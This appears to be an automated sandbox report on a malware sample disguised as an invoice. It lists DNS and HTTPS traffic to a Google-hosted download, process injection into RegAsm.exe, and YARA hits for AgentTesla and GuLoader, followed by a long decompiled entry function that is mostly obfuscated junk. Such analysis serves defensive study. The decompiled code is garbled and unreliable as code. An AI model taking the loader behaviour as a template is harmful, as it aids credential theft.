Apr 15, 2021 14:05:00.910329103 CEST	58367	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:05:01.012533903 CEST	53	58367	8.8.8.8	192.168.2.7
Apr 15, 2021 14:05:01.575809956 CEST	60599	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:05:01.816560984 CEST	53	60599	8.8.8.8	192.168.2.7
Apr 15, 2021 14:05:02.398222923 CEST	59571	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:05:02.455689907 CEST	53	59571	8.8.8.8	192.168.2.7
Apr 15, 2021 14:05:02.689614058 CEST	52689	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:05:02.754874945 CEST	53	52689	8.8.8.8	192.168.2.7
Apr 15, 2021 14:05:02.902904034 CEST	50290	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:05:02.990034103 CEST	53	50290	8.8.8.8	192.168.2.7
Apr 15, 2021 14:05:03.557638884 CEST	60427	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:05:03.686425924 CEST	53	60427	8.8.8.8	192.168.2.7
Apr 15, 2021 14:05:04.432878017 CEST	56209	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:05:04.489887953 CEST	53	56209	8.8.8.8	192.168.2.7
Apr 15, 2021 14:05:05.141227961 CEST	59582	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:05:05.198559999 CEST	53	59582	8.8.8.8	192.168.2.7
Apr 15, 2021 14:05:06.189922094 CEST	60949	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:05:06.250034094 CEST	53	60949	8.8.8.8	192.168.2.7
Apr 15, 2021 14:05:07.184478045 CEST	58542	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:05:07.241842031 CEST	53	58542	8.8.8.8	192.168.2.7
Apr 15, 2021 14:05:07.915469885 CEST	59179	53	192.168.2.7	8.8.8.8
Apr 15, 2021 14:05:07.972846031 CEST	53	59179	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 15, 2021 14:03:48.000417948 CEST	192.168.2.7	8.8.8.8	0xe7be	Standard query (0)	doc-0s-04-docs.googleusercontent.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 15, 2021 14:03:48.065246105 CEST	8.8.8.8	192.168.2.7	0xe7be	No error (0)	doc-0s-04-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Apr 15, 2021 14:03:48.065246105 CEST	8.8.8.8	192.168.2.7	0xe7be	No error (0)	googlehosted.l.googleusercontent.com		172.217.23.33	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Apr 15, 2021 14:03:48.170511961 CEST	172.217.23.33	443	192.168.2.7	49712	CN=*.googleusercontent.com, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Tue Mar 16 20:32:57 CET 2021 Thu Jun 15 02:00:42 CEST 2017	Tue Jun 08 21:32:56 CEST 2021 Wed Dec 15 01:00:42 CET 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Apr 15, 2021 14:03:48.170511961 CEST	172.217.23.33	443	192.168.2.7	49712	CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Thu Jun 15 02:00:42 CEST 2017	Wed Dec 15 01:00:42 CET 2021		37f463bf4616ecd445d4a1937da06e19

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: faktura_ODfk0021.exe PID: 3784 Parent PID: 5672

General

Start time:	14:03:03
Start date:	15/04/2021
Path:	C:\Users\user\Desktop\faktura_ODfk0021.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\faktura_ODfk0021.exe'
Imagebase:	0x400000
File size:	73728 bytes
MD5 hash:	B7B1644FCE14205ACECBE822DF95749A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 6328 Parent PID: 3784

General

Start time:	14:03:25
Start date:	15/04/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\faktura_ODfk0021.exe'
Imagebase:	0x840000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.499283716.000000001DA11000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.499283716.000000001DA11000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000003.00000002.491326318.0000000000C21000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6336 Parent PID: 6328

General

Start time:	14:03:25
Start date:	15/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff774ee0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: faktura_ODfk0021.exe PID: 3784 Parent PID: 5672 faktura_ODfk0021.exeCOMMON

Executed Functions

Function 004015B4, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 270
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			_entry_(signed int __eax, void* __edx, intOrPtr* __edi, void* __esi, void* __fp0, char _a1, intOrPtr* _a3, char _a64, intOrPtr _a77, intOrPtr _a262208, intOrPtr _a327744, char _a458816, intOrPtr _a12245928) {
				char _v1;
				signed int _v9;
				intOrPtr _v13;
				signed int _v17;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v48;
				char _v52;
				char _v69;
				char _v85;
				char* _v109;
				char _v117;
				intOrPtr _v125;
				char _v133;
				signed int _v136;
				short _v137;
				signed int _v140;
				signed int* _v152;
				signed int _v156;
				intOrPtr* _t279;
				signed int _t280;
				signed int _t281;
				intOrPtr* _t283;
				intOrPtr* _t284;
				signed int _t287;
				signed int _t289;
				signed char _t290;
				signed int _t291;
				signed char _t292;
				intOrPtr* _t293;
				signed int _t295;
				signed int* _t296;
				signed int _t297;
				signed char _t299;
				intOrPtr* _t300;
				intOrPtr* _t302;
				intOrPtr* _t303;
				intOrPtr* _t304;
				intOrPtr* _t305;
				intOrPtr* _t306;
				intOrPtr* _t307;
				intOrPtr* _t308;
				intOrPtr* _t309;
				intOrPtr* _t311;
				intOrPtr* _t312;
				intOrPtr* _t313;
				signed int _t314;
				signed int _t315;
				intOrPtr* _t318;
				void* _t320;
				void* _t321;
				void* _t323;
				void* _t324;
				void* _t325;
				signed char _t326;
				signed char _t327;
				void* _t330;
				void* _t332;
				void* _t333;
				void* _t334;
				signed int _t336;
				void* _t337;
				void* _t338;
				signed int _t339;
				signed int _t340;
				void* _t341;
				void* _t343;
				void* _t344;
				void* _t346;
				signed int _t347;
				void* _t348;
				signed char _t388;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				intOrPtr* _t394;
				intOrPtr* _t395;
				intOrPtr* _t397;
				signed int* _t398;
				intOrPtr* _t401;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t413;
				signed char _t414;
				signed char _t415;
				signed int _t417;
				signed int _t419;
				signed char _t420;
				signed int _t422;
				signed int _t424;
				void* _t425;
				signed int _t427;
				void* _t429;
				intOrPtr* _t431;
				void* _t432;
				void* _t433;
				void* _t434;
				signed int* _t435;
				intOrPtr* _t436;
				void* _t437;
				void* _t438;
				intOrPtr* _t439;
				signed int* _t441;
				signed int* _t445;
				signed int* _t446;
				void* _t447;
				intOrPtr* _t452;
				void* _t454;
				intOrPtr* _t455;
				intOrPtr* _t457;
				signed int _t459;
				signed int _t460;
				void* _t462;
				signed int _t463;
				char* _t466;
				signed int _t468;
				signed int _t469;
				void* _t470;
				void* _t474;
				void* _t475;
				void* _t476;
				intOrPtr* _t481;
				intOrPtr _t500;
				void* _t501;
				void* _t502;

				_t462 = __esi;
				_t457 = __edi;
				_push("VB5!6&*"); // executed
				L004015AE(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t279 = __eax + 1;
				 *_t279 =  *_t279 + _t279;
				 *_t279 =  *_t279 + _t279;
				 *_t279 =  *_t279 + _t279;
				_t280 = _t279 + _t279;
				asm("scasb");
				_t439 = 0;
				if(_t280 != 0x4e) {
					L6:
					asm("cli");
					asm("insd");
					_t280 = _t280 - 1;
					_t457 = _t457 + 1;
					asm("sbb dword [edx], 0x24bd732f");
					asm("loopne 0x10");
					_t427 = _t425 - 0x00000001 ^  *(_t439 - 0x48ee309a);
					goto L7;
				} else {
					asm("int1");
					_t427 = 0;
					 *_t280 =  *_t280 + _t280;
					 *_t280 =  *_t280 + _t280;
					 *_t280 =  *_t280 + _t280;
					_t439 =  *0x726f460a;
					_t481 = _t439;
					_push(0);
					_push(0x75);
					if(_t481 >= 0) {
						L8:
						 *0xc1b4469a =  *0xc1b4469a + 0xc1b4469a;
						goto L9;
					} else {
						if(_t481 < 0) {
							L9:
							_push(0xc1b4469a);
							 *_t280 =  *_t280 + _t280;
							 *_t280 =  *_t280 + _t280;
							_push(cs);
							 *((intOrPtr*)(_t427 + 0x45)) =  *((intOrPtr*)(_t427 + 0x45)) + _t280;
							_t462 = _t462 - 1;
							_push(_t474);
							_t466 =  &_a1;
							_push(0xc1b4469a);
							_t281 = _t280 - 1;
						} else {
							if(_t481 < 0) {
								L7:
								asm("iretd");
								asm("adc [edi+0xaa000c], esi");
								asm("pushad");
								asm("rcl dword [ebx], cl");
								 *_t280 =  *_t280 + _t280;
								 *_t280 =  *_t280 + _t280;
								 *_t280 =  *_t280 + _t280;
								 *_t280 =  *_t280 + _t280;
								 *_t280 =  *_t280 + _t280;
								 *_t280 =  *_t280 + _t280;
								 *_t280 =  *_t280 + _t280;
								 *_t280 =  *_t280 + _t280;
								 *_t280 =  *_t280 + _t280;
								 *_t280 =  *_t280 + _t280;
								 *_t280 =  *_t280 + _t280;
								 *_t280 =  *_t280 + _t280;
								 *_t280 =  *_t280 + _t280;
								 *_t280 =  *_t280 + _t280;
								 *_t280 =  *_t280 + _t280;
								 *_t280 =  *_t280 + _t280;
								goto L8;
							} else {
								 *_t280 =  *_t280 + _t280;
								_t439 = _t439 - 1;
								_t424 = _t280;
								 *_t424 =  *_t424 + _t424;
								_t474 = _t474 - 1;
								 *_t424 =  *_t424 ^ _t424;
								_t281 = _t424 + 0x6d740047;
								_t469 = 0xa34121e1;
								if(_t281 == 0) {
									asm("into");
									asm("wait");
									asm("in al, 0xfa");
									goto L6;
								}
							}
						}
					}
				}
				_t475 = _t474 - 1;
				_t463 = _t462 + 1;
				_t452 = 0xffffffffc1b4469b;
				_t441 = _t439 + 2;
				_t429 = _t427 + 1 - 1;
				 *0x42000b01 =  *0x42000b01 + _t441;
				if( *0x42000b01 < 0) {
					asm("a16 gs insd");
					asm("outsd");
					asm("fs outsb");
					_t415 = _t281 ^  *[gs:eax];
					asm("sbb [ecx], eax");
					 *((intOrPtr*)(0xffffffffc1b4469b)) =  *((intOrPtr*)(0xffffffffc1b4469b)) + _t415;
					_t417 = _t415 &  *_t441 & 0x0000000b;
					 *0xFFFFFFFFC1B44714 =  *((intOrPtr*)(0xffffffffc1b44714)) + _t417;
					asm("a16 gs insd");
					asm("outsd");
					asm("fs outsb");
					_t419 = _t417 ^  *[gs:eax] ^ 0x00001514;
					asm("aas");
					_pop(ds);
					 *_t419 =  *_t419 + _t419;
					asm("lodsd");
					asm("sbb al, 0x0");
					 *0xFFFFFFFFC1B446AF =  *((intOrPtr*)(0xffffffffc1b446af)) + _t441;
					 *_t419 =  *_t419 + _t419;
					 *((intOrPtr*)(_t463 + 3)) =  *((intOrPtr*)(_t463 + 3)) + _t419;
					 *_t441 =  *_t441 + 1;
					_t420 = _t419 ^  *_t419;
					 *_t420 =  *_t420 + _t420;
					 *_t420 =  *_t420 + _t441;
					 *((intOrPtr*)(_t429 + 0x6f)) =  *((intOrPtr*)(_t429 + 0x6f)) + _t420;
					asm("insd");
					asm("insd");
					asm("popad");
					asm("outsb");
					_t422 = (_t420 ^  *[fs:eax]) + 1;
					asm("adc [eax], eax");
					_push(_t429);
					_t438 = _t429 - 1;
					_push(0xffffffffc1b4469b);
					_t475 = _t475 + 1 - 1 + 1;
					_t441 =  &(_t441[0]);
					_push(_t438);
					_push(_t463);
					_push(0xffffffffc1b4469b);
					_t429 = _t438 - 1;
					_push(0xffffffffc1b4469b);
					_t463 = _t463 - 1;
					_t469 =  &_a1;
					 *((intOrPtr*)(_t422 + _t422 * 4)) =  *((intOrPtr*)(_t422 + _t422 * 4)) + _t422;
					es = _t429;
					_t457 = _t457 + 1 +  *((intOrPtr*)(_t457 + 0x1101ef05));
					_t281 = _t422 - 1 +  *((intOrPtr*)(_t422 - 1));
				}
				_t476 = _t475 +  *_t457;
				 *_t281 =  *_t281 + _t281;
				 *_t452 =  *_t452 + _t281;
				 *_t281 =  *_t281 | _t281;
				_t431 = _t429 + _t429 + 1;
				asm("outsd");
				asm("insd");
				asm("insd");
				asm("popad");
				asm("outsb");
				 *[fs:eax] =  *[fs:eax] ^ _t281;
				_t283 = _t281 + 0x45554101;
				_push(_t476);
				 *((intOrPtr*)(_t283 + (_t457 - 1) * 2)) =  *((intOrPtr*)(_t283 + (_t457 - 1) * 2)) + _t283;
				 *((intOrPtr*)(_t283 + 3)) =  *((intOrPtr*)(_t283 + 3)) + _t441;
				_t459 = 0x1101ef04;
				_t284 = _t283 +  *_t283;
				 *_t431 =  *_t431 + 1;
				 *_t284 =  *_t284 - _t284;
				 *_t284 =  *_t284 + _t284;
				_t285 = _t284 +  *0x78655400;
				if(_t285 == 0) {
					L17:
					 *_t431 =  *_t431 + _t441;
					asm("adc [eax], al");
					_pop(_t454);
					_t476 = _t476 + 1;
					_t460 = _t459 - 1;
					_pop(_t287);
					_push(_t476);
					_t452 = _t454;
					_t441 =  &(_t441[0]) - 1;
					_t463 = _t463;
					_t468 =  &_a1;
					 *_t452 =  *_t452 + _t452;
					 *_t287 =  *_t287 + _t287;
					 *_t431 =  *_t431 + 1;
					 *[cs:eax] =  *[cs:eax] + _t287;
					 *0x72460006 =  *0x72460006 + _t287;
					asm("popad");
					asm("insd");
					 *[gs:eax] =  *[gs:eax] ^ _t287;
					goto L18;
				} else {
					 *_t452 =  *_t452 + _t285;
					_t414 = _t285 + 0xf8;
					_pop(es);
					if (_t414 < 0) goto L14;
					_t460 = 0xb01ef04;
					_t289 = _t414 |  *_t414;
					_t432 = _t431 - 1;
					asm("insb");
					if(_t432 < 0) {
						asm("a16 push 0x387375");
						asm("adc al, [ecx]");
						_t431 = _t432 + _t432;
						_t468 = _t466 +  *0xb01ef04;
						 *_t289 =  *_t289 + _t289;
						_t24 = _t289 + 0x78655400;
						 *_t24 =  *((intOrPtr*)(_t289 + 0x78655400)) + _t289;
						if( *_t24 != 0) {
							 *_t452 =  *_t452 + _t289;
							_t285 = _t289 + 0xf0;
							 *((intOrPtr*)(_t289 + 0xf0)) =  *((intOrPtr*)(_t289 + 0xf0)) + _t431;
							_t459 = 0xb01ef04;
							goto L17;
						}
						L18:
						 *_t431 =  *_t431 + _t287;
						 *_t463 =  *_t463 + _t441;
						 *((intOrPtr*)(_t463 + 0x75 + _t468 * 2)) =  *((intOrPtr*)(_t463 + 0x75 + _t468 * 2)) + _t441;
						_push(0x76);
						asm("outsb");
						_t469 =  *(_t463 + 0x67) * 0x656e7265;
						 *0x78 =  *0x78 + _t287;
						asm("cmpsd");
						_t432 = _t431 + _t431;
						_t289 = (_t287 | 0x04120c3f) +  *((intOrPtr*)((_t287 | 0x04120c3f) + (_t287 | 0x04120c3f)));
						 *((intOrPtr*)(_t463 + 0x42)) =  *((intOrPtr*)(_t463 + 0x42)) + _t452;
					}
				}
				_push(_t463);
				_t455 = _t452 + 1;
				_t290 = _t289 ^ 0x2a263621;
				 *_t290 =  *_t290 + _t290;
				 *_t290 =  *_t290 + _t290;
				 *_t290 =  *_t290 + _t290;
				 *_t290 =  *_t290 + _t290;
				 *_t290 =  *_t290 + _t290;
				 *_t290 =  *_t290 + _t290;
				 *_t463 =  *_t463 + _t432;
				 *_t290 =  *_t290 + _t290;
				 *_t290 =  *_t290 + _t290;
				 *_t290 =  *_t290 + _t290;
				 *_t290 =  *_t290 + _t290;
				 *_t290 =  *_t290 + _t290;
				 *_t290 =  *_t290 + _t290;
				_t291 = _t290 |  *_t290;
				 *(_t291 + _t291) =  *(_t291 + _t291) | _t291;
				 *_t291 =  *_t291 + _t291;
				 *_t291 =  *_t291 + _t291;
				 *_t291 =  *_t291 + _t291;
				 *_t291 =  *_t291 + _t291;
				 *((intOrPtr*)(_t291 + 0x1b)) =  *((intOrPtr*)(_t291 + 0x1b)) + _t291;
				_t292 = _t291 + 1;
				 *((intOrPtr*)(_t292 + _t463 * 8)) =  *((intOrPtr*)(_t292 + _t463 * 8)) + _t432;
				 *_t292 =  *_t292 ^ _t292;
				_t433 = _t432 + _t432;
				asm("invalid");
				 *_t292 =  *_t292 | _t292;
				 *_t292 =  *_t292 + _t292;
				 *_t292 =  *_t292 + _t292;
				 *_t292 =  *_t292 + _t292;
				_t293 = _t292 +  *_t292;
				 *_t293 =  *_t293 + _t293;
				goto 0x304017e9;
				asm("sbb [eax], al");
				asm("pushfd");
				_pop(ss);
				_t295 = _t293 + 1 + _t293 + 1;
				asm("adc eax, 0x780040");
				 *_t295 =  *_t295 + _t295;
				if ( *_t295 <= 0) goto L21;
				 *_t295 =  *_t295 + _t295;
				_t296 =  *_t295;
				 *_t296 = _t295;
				 *_t296 = _t296 +  *_t296;
				_t297 =  *_t296;
				 *_t297 = _t296;
				 *_t297 =  *_t297 + _t297;
				 *_t297 =  *_t297 + _t297;
				 *_t297 =  *_t297 + _t297;
				 *_t297 =  *_t297 + _t297;
				 *_t297 =  *_t297 + _t297;
				 *_t297 =  *_t297 + _t297;
				 *_t297 =  *_t297 + _t297;
				 *_t297 =  *_t297 + _t297;
				 *_t297 =  *_t297 + _t297;
				_t434 = _t433 + 1;
				asm("popad");
				if(_t434 >= 0) {
					_t469 =  &_v1;
					__eflags = _t297 & 0x7ea9825c;
					_pop(_t441);
					__eflags =  *_t441;
					goto L33;
				} else {
					asm("aaa");
					_t46 = _t455 + 0x65;
					 *_t46 =  *((intOrPtr*)(_t455 + 0x65)) + _t297;
					_t500 =  *_t46;
					if(_t500 < 0) {
						L31:
						_push(_t297);
						 *_t297 =  *_t297 + _t297;
						 *_t460 =  *_t460 + _t441;
						return _t297;
					} else {
						if(_t500 < 0) {
							L36:
							 *_t297 =  *_t297 + _t297;
							 *_t297 =  *_t297 + _t297;
							 *_t297 =  *_t297 + _t297;
							 *_t297 =  *_t297 + _t297;
							 *_t297 =  *_t297 + _t297;
							 *_t297 =  *_t297 + _t297;
							__eflags =  *_t297;
							goto L37;
						} else {
							 *_t297 =  *_t297 + _t297;
							_t501 =  *_t297;
							_push(_t434);
							_push(0x75);
							if(_t501 >= 0) {
								L33:
								if (__eflags >= 0) goto L35;
								goto L34;
							} else {
								if(_t501 < 0) {
									L34:
									 *_t297 =  *_t297 + _t297;
									__eflags =  *_t297;
									 *_t297 =  *_t297 + _t297;
									 *_t297 =  *_t297 + _t297;
									 *_t297 =  *_t297 + _t297;
									__eflags =  *_t297;
									goto L36;
								} else {
									if(_t501 < 0) {
										L30:
										 *_t297 =  *_t297 + _t297;
										 *_t297 =  *_t297 + _t297;
										 *_t297 =  *_t297 + _t297;
										 *_t297 =  *_t297 + _t297;
										 *_t297 =  *_t297 + _t297;
										 *_t297 =  *_t297 + _t297;
										 *_t297 =  *_t297 + _t297;
										_t413 = _t463;
										 *_t413 =  *_t413 + _t413;
										 *_t413 =  *_t413 + _t413;
										 *_t413 =  *_t413 + _t413;
										 *(_t297 + _t455) =  *(_t297 + _t455) + _t413;
										_t297 = _t413 + 1;
										 *((intOrPtr*)(_t297 + _t297)) =  *((intOrPtr*)(_t297 + _t297)) + _t441;
										 *_t297 =  *_t297 + _t455;
										goto L31;
									} else {
										 *_t297 =  *_t297 + _t297;
										_push(_t297);
										 *_t297 =  *_t297 + _t297;
										 *_t460 =  *_t460 + _t297;
										_t502 =  *_t460;
										if(_t502 == 0) {
											L37:
											 *_t297 =  *_t297 + _t297;
											 *_t297 =  *_t297 + _t297;
											 *_t297 =  *_t297 + _t297;
											 *_t297 =  *_t297 + _t297;
											 *_t297 =  *_t297 + _t297;
											 *_t297 =  *_t297 + _t297;
											 *_t297 =  *_t297 + _t297;
											 *_t297 =  *_t297 + _t297;
											 *_t297 =  *_t297 + _t297;
											 *_t297 =  *_t297 + _t297;
											 *_t297 =  *_t297 + _t297;
											_a77 = _a77 + _t441;
											 *_t297 =  *_t297 + _t297;
											_t299 = _t297 + _t455 ^  *(_t297 + _t455);
											asm("pushfd");
											 *_t299 =  *_t299 + _t299;
											 *_t463 =  *_t463 + _t299;
											 *_t299 =  *_t299 + _t299;
											 *_t299 =  *_t299 + _t455;
											 *_t299 =  *_t299 ^ _t299;
											_pop(es);
											 *_t299 =  *_t299 + _t299;
											 *((intOrPtr*)(_t299 + 0x700402c)) =  *((intOrPtr*)(_t299 + 0x700402c)) + _t299;
											 *_t299 =  *_t299 + _t299;
											 *((intOrPtr*)(_t299 + 0x2c)) =  *((intOrPtr*)(_t299 + 0x2c)) + _t441;
											_t300 = _t299 + 1;
											 *_t460 =  *_t460 + _t300;
											 *_t300 =  *_t300 + _t300;
											_t302 = _t300 + _t455 -  *((intOrPtr*)(_t300 + _t455));
											_pop(es);
											 *_t302 =  *_t302 + _t302;
											 *((intOrPtr*)(_t302 + 0x700402b)) =  *((intOrPtr*)(_t302 + 0x700402b)) + _t441;
											 *_t302 =  *_t302 + _t302;
											 *((intOrPtr*)(_t434 +  &_a64)) =  *((intOrPtr*)(_t434 +  &_a64)) + _t302;
											 *_t460 =  *_t460 + _t302;
											 *_t302 =  *_t302 + _t302;
											 *((intOrPtr*)(_t434 + _t469)) =  *((intOrPtr*)(_t434 + _t469)) + _t434;
											_t303 = _t302 + 1;
											 *_t460 =  *_t460 + _t303;
											 *_t303 =  *_t303 + _t303;
											 *((intOrPtr*)(_t455 +  &_a458816)) =  *((intOrPtr*)(_t455 +  &_a458816)) + _t303;
											 *_t303 =  *_t303 + _t303;
											_t304 = _t303 -  *_t303;
											_pop(es);
											 *_t304 =  *_t304 + _t304;
											_t305 = _t304 + _t455;
											 *_t305 =  *_t305 - _t305;
											_pop(es);
											 *_t305 =  *_t305 + _t305;
											 *((intOrPtr*)(_t305 + 0x7004029)) =  *((intOrPtr*)(_t305 + 0x7004029)) + _t455;
											 *_t305 =  *_t305 + _t305;
											 *((intOrPtr*)(_t305 + 0x29)) =  *((intOrPtr*)(_t305 + 0x29)) + _t434;
											_t306 = _t305 + 1;
											 *_t460 =  *_t460 + _t306;
											 *_t306 =  *_t306 + _t306;
											 *((intOrPtr*)(_t441 + _t469)) =  *((intOrPtr*)(_t441 + _t469)) + _t455;
											_t307 = _t306 + 1;
											 *_t460 =  *_t460 + _t307;
											 *_t307 =  *_t307 + _t307;
											_t308 = _t307 + _t441;
											 *_t308 =  *_t308 - _t308;
											_pop(es);
											 *_t308 =  *_t308 + _t308;
											 *((intOrPtr*)(_t308 +  &_a64)) =  *((intOrPtr*)(_t308 +  &_a64)) + _t434;
											 *_t460 =  *_t460 + _t308;
											 *_t308 =  *_t308 + _t308;
											 *((intOrPtr*)(_t308 + _t469)) =  *((intOrPtr*)(_t308 + _t469)) + _t455;
											_t309 = _t308 + 1;
											 *_t460 =  *_t460 + _t309;
											 *_t309 =  *_t309 + _t309;
											asm("daa");
											_t311 = _t309 + _t441 + 1;
											 *_t460 =  *_t460 + _t311;
											 *_t311 =  *_t311 + _t311;
											 *((intOrPtr*)(_t311 + 0x7004027)) =  *((intOrPtr*)(_t311 + 0x7004027)) + _t434;
											 *_t311 =  *_t311 + _t311;
											 *_t460 =  *_t460 + _t455;
											_t312 = _t311 + 1;
											 *_t460 =  *_t460 + _t312;
											 *_t312 =  *_t312 + _t312;
											 *((intOrPtr*)(_t312 + 0x7004026)) =  *((intOrPtr*)(_t312 + 0x7004026)) + _t434;
											 *_t312 =  *_t312 + _t312;
											 *((intOrPtr*)(_t312 + 0x26)) =  *((intOrPtr*)(_t312 + 0x26)) + _t312;
											_t313 = _t312 + 1;
											 *_t460 =  *_t460 + _t313;
											 *_t313 =  *_t313 + _t313;
											 *_t313 =  *_t313 + _t441;
											_t314 = _t313 + 1;
											 *_t441 =  *_t441 + _t314;
											 *_t441 =  *_t441 + _t314;
											 *_t314 =  *_t314 + _t455;
											_t315 = _t314 &  *_t314;
											 *_t315 =  *_t315 + _t315;
											 *_t315 =  *_t315 + _t315;
											 *((intOrPtr*)(_t441 - 0xffc0)) = es;
											asm("invalid");
											 *_t315 =  *_t315 + _t315;
											 *_t315 =  *_t315 + _t315;
											 *0x00000048 =  *0x00000048 + _t434;
											_t445 =  &(_t441[0]);
											 *0x00000024 =  *((intOrPtr*)(0x24)) + 0x24;
											 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
											 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + _t445;
											__eflags =  *0x00000048 & _t460;
											 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
											 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
											 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
											 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
											 *((intOrPtr*)(0x24)) =  *((intOrPtr*)(0x24)) + 0x24;
											_t318 = 0x24 + _t434;
											asm("sbb [eax], eax");
											 *_t318 =  *_t318 + _t318;
											 *_t318 =  *_t318 + _t318;
											 *0x4032 =  *0x4032 + 0x4032;
											_t320 = 0x4032 + _t434;
											asm("sbb [eax], eax");
											 *0x4032 =  *0x4032 + 0x4032;
											 *0x4032 =  *0x4032 + _t320;
											 *_t455 =  *_t455 + _t434;
											_t321 = _t320 + 1;
											 *0x4032 =  *0x4032 + _t321;
											 *0x4032 =  *0x4032 + _t321;
											asm("sbb [eax], eax");
											_t323 = _t321 + _t434 +  *0x4032;
											 *0x4032 =  *0x4032 + _t323;
											 *_t455 =  *_t455 + _t434;
											_t324 = _t323 + 1;
											 *0x4032 =  *0x4032 + _t324;
											 *((intOrPtr*)(_t460 + 0x6c006801)) =  *((intOrPtr*)(_t460 + 0x6c006801)) + _t455;
											 *0x0000404C =  *((intOrPtr*)(0x404c)) + _t455;
											_t325 = _t324 + 1;
											_a12245928 = _a12245928 + _t445;
											 *0x4032 =  *0x4032 + _t325;
											 *0x4032 =  *0x4032 + _t325;
											 *0x00004075 =  *((intOrPtr*)(0x4075)) + _t434;
											 *0x4032 =  *0x4032 + 0x4032c8;
											asm("in al, dx");
											 *0x4032 =  *0x4032 ^ 0x00004032;
											_t326 = _t325 + 1;
											 *_t460 =  *_t460 + _t434;
											 *0x00008064 =  *((intOrPtr*)(0x8064)) + _t455;
											 *0x4032 =  *0x4032 + _t326;
											asm("clc");
											_t327 = _t326 & 0x00000040;
											_t435 = _t434 + _t434;
											asm("invalid");
											 *0x4032 =  *0x4032 + 1;
											 *0x4032 =  *0x4032 + _t327;
											 *0x4032 =  *0x4032 + _t327;
											 *0x4032 =  *0x4032 + _t327;
											 *((intOrPtr*)(0x404c)) =  *((intOrPtr*)(0x404c)) + _t455;
											 *0x0800BD93 =  *((intOrPtr*)(0x800bd93)) + _t455;
											asm("invalid");
											_t330 = (_t327 + 0x00000001 & 0xffff0040) + 1;
											 *_t445 =  *_t445 + _t455;
											 *0x4032 = _t435 +  *0x4032;
											 *0x4032 =  *0x4032 + _t330;
											 *0x01008057 =  *((intOrPtr*)(0x1008057)) + _t445;
											 *_t435 =  *_t435 + _t330;
											 *0x4032 =  *0x4032 + _t330;
											 *0x4032 =  *0x4032 + _t330;
											 *0x4032 =  *0x4032 + _t330;
											 *0x4032 =  *0x4032 + _t330;
											asm("sbb al, [eax]");
											_t445[0x1f] = _t445[0x1f] << 0;
											_t332 = _t330 + _t330 + 1;
											 *_t445 =  *_t445 + _t332;
											 *_t435 =  *_t435 + _t332;
											 *0x4032 =  *0x4032 + _t332;
											 *0x4032 =  *0x4032 + _t332;
											 *0x4032 =  *0x4032 + _t332;
											asm("sbb al, [eax]");
